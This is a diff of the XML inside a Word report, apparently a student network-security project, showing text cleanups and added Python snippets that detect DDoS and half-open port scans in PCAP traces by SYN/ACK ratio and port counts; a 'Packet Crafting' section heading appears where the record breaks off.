--- a/Final_1.0.docx
+++ b/Final_1.0.docx
@@ -914,7 +914,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>E</w:t>
+        <w:t>Explore forming Malformed packets and analyze their impact on some target and writing a script to analyze the same</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -923,105 +923,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>xplore forming Malformed packets</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and analyze</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> their impact on some</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">arget and writing a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">cript to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>naly</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>e the same</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
@@ -1031,16 +932,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="00000A"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>rogrammatically analyze trace data to detect port scanning activity</w:t>
+        <w:t>Programmatically analyze trace data to detect port scanning activity</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1161,13 +1053,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>O</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>bserve the target's response with a packet</w:t>
+        <w:t>Observe the target's response with a packet</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1286,19 +1172,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>evelop a Python program that analyzes a PCAP file in order to detect possible</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>port scans.</w:t>
+        <w:t>evelop a Python program that analyzes a PCAP file in order to detect possible port scans.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1454,61 +1328,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">$ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">python3 analyser.py </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>&lt;PAT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>H</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>_TO_</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>F</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>ILE&gt;</w:t>
+        <w:t>$ # python3 analyser.py &lt;PATH_TO_FILE&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1533,15 +1353,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>$ python3 an</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">alyser.py </w:t>
+        <w:t xml:space="preserve">$ python3 analyser.py </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1805,14 +1617,407 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We then keep track of SYN to ACK ratio per IP address. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">We later check if it is a: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>DDos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Attack by:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, count in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>self.malicious</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>_ip.items</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>():</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>if(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>count[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>0] &gt; 3 * count[1]):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t># Add to attack list</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Port Scan by:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>TYPE: TCP-HALF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-OPEN</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>s.get_port_lists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>).keys</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>():</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">ports = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>self.port</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>_list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1080" w:right="1350" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>(ports) &gt; 1000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2002,7 +2207,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>References</w:t>
       </w:r>
       <w:r>
@@ -4459,7 +4663,7 @@
   <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7F1E0404"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="85E64C96"/>
+    <w:tmpl w:val="8A684D5A"/>
     <w:lvl w:ilvl="0" w:tplc="04090001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -4472,7 +4676,7 @@
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="04090003">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -5946,7 +6150,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BBE791BC-D4C1-41DD-9CC8-FBB261F691A2}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DC4080E7-019E-4721-8C69-EA4D1E14B1F4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Final_1.0.docx
+++ b/Final_1.0.docx
@@ -901,38 +901,20 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="00000A"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
         </w:rPr>
         <w:t>Explore forming Malformed packets and analyze their impact on some target and writing a script to analyze the same</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="TimesNewRomanPSMT" w:hAnsi="TimesNewRomanPSMT" w:cs="TimesNewRomanPSMT"/>
-          <w:color w:val="00000A"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Programmatically analyze trace data to detect port scanning activity</w:t>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>. Programmatically analyze trace data to detect port scanning activity</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1823,7 +1805,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1838,7 +1819,6 @@
         </w:rPr>
         <w:t>-OPEN</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2016,6 +1996,2450 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>Forming Malformed Packets</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Packet Crafting: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
